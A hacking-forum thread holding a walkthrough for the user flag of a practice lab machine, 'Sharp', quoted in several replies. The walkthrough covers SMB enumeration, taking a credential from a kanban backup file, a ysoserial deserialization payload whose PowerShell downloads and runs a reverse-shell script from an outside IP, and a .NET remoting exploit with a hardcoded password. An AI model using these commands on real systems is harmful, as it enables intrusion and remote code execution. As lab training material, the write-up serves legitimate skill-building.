TUTORIAL Tutorial Get user Sharp hard machine
by sami92 - March 07, 2021 at 08:46 PM
#1
user:
    1. Verify connection to smblient shares
        - sudo smbclient -L \\\\ 10.10.10.219 \\ -N
    2. Download the kanban files
        - smbget -R smb: //10.10.10.219/kanban -U Anonymous
    3. Remove the password hash from the PortableKanban.pk3.bak file
    4. Run the kanban binary and login user: Administrator password Empty
    5. In user tab, disable unhidden password box, obtain lars user credential
    6. Run in cmd: ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX (new-object net.webclient) .downloadstring ('http://10.10.15.84/Invoke-PowerShellTcp.ps1 ') "
    7. Launch the exploit: ExploitRemotingService.exe -s --user = debug --pass = "SharpApplicationDebugUserPassword123!" tcp: //10.10.10.219: 8888 / SecretSharpDebugApplicationEndpoint raw (here paste to payload serialize)
    8. type c: \ Users \ lars \ Desktop \ user.txt
#2
(March 07, 2021 at 08:46 PM)sami92 Wrote: user:
    1. Verify connection to smblient shares
        - sudo smbclient -L \\\\ 10.10.10.219 \\ -N
    2. Download the kanban files
        - smbget -R smb: //10.10.10.219/kanban -U Anonymous
    3. Remove the password hash from the PortableKanban.pk3.bak file
    4. Run the kanban binary and login user: Administrator password Empty
    5. In user tab, disable unhidden password box, obtain lars user credential
    6. Run in cmd: ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX (new-object net.webclient) .downloadstring ('http://10.10.15.84/Invoke-PowerShellTcp.ps1 ') "
    7. Launch the exploit: ExploitRemotingService.exe -s --user = debug --pass = "SharpApplicationDebugUserPassword123!" tcp: //10.10.10.219: 8888 / SecretSharpDebugApplicationEndpoint raw (here paste to payload serialize)
    8. type c: \ Users \ lars \ Desktop \ user.txt

i executed the 6 step but i got 'Gadget not Supported'. Why??
#3
(March 18, 2021 at 12:51 AM)kolovos77 Wrote:
(March 07, 2021 at 08:46 PM)sami92 Wrote: user:
    1. Verify connection to smblient shares
        - sudo smbclient -L \\\\ 10.10.10.219 \\ -N
    2. Download the kanban files
        - smbget -R smb: //10.10.10.219/kanban -U Anonymous
    3. Remove the password hash from the PortableKanban.pk3.bak file
    4. Run the kanban binary and login user: Administrator password Empty
    5. In user tab, disable unhidden password box, obtain lars user credential
    6. Run in cmd: ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell -c IEX (new-object net.webclient) .downloadstring ('http://10.10.15.84/Invoke-PowerShellTcp.ps1 ') "
    7. Launch the exploit: ExploitRemotingService.exe -s --user = debug --pass = "SharpApplicationDebugUserPassword123!" tcp: //10.10.10.219: 8888 / SecretSharpDebugApplicationEndpoint raw (here paste to payload serialize)
    8. type c: \ Users \ lars \ Desktop \ user.txt

i executed the 6 step but i got 'Gadget not Supported'. Why??

Think! 😎
#4
thanks for the user!!!time for root
#5
(March 29, 2021 at 01:50 AM)ghostdog1971 Wrote: thanks for the user!!!time for root

Hidden Content
You must register or login to view this content.
#6
(March 29, 2021 at 07:03 PM)sami92 Wrote:
(March 29, 2021 at 01:50 AM)ghostdog1971 Wrote: thanks for the user!!!time for root

[Hidden Content]

Is this tutorial for root?
This forum account is currently banned. Ban Length: Permanent (N/A).
Ban Reason: Mass Leeching
#7
[quote = "justanobody" pid = '3636348' dateline = '1617148422']
[quote = "sami92" pid = '3631243' dateline = '1617041032']
[quote = "ghostdog1971" pid = '3628365' dateline = '1616979051']
gracias por el usuario !!! tiempo para root
[/cita]

[Contenido oculto]
[/cita]

¿Este tutorial es para root?
[/cita]

si, es para root

Possibly Related Threads…
Thread Author Replies Views Last Post
SELLING HTB Toby Machine Writeup mobile1 15 2,347 November 30, 2021 at 08:19 AM
Last Post: mobile1
SELLING HTB Toby Machine Writeup mobile1 2 598 November 16, 2021 at 11:53 PM
Last Post: mobile1
TUTORIAL Pikaboo Machine Discussion La Lisa 99 28,524 November 15, 2021 at 08:47 PM
Last Post: as3di0

 Users browsing this thread: 1 Guest(s)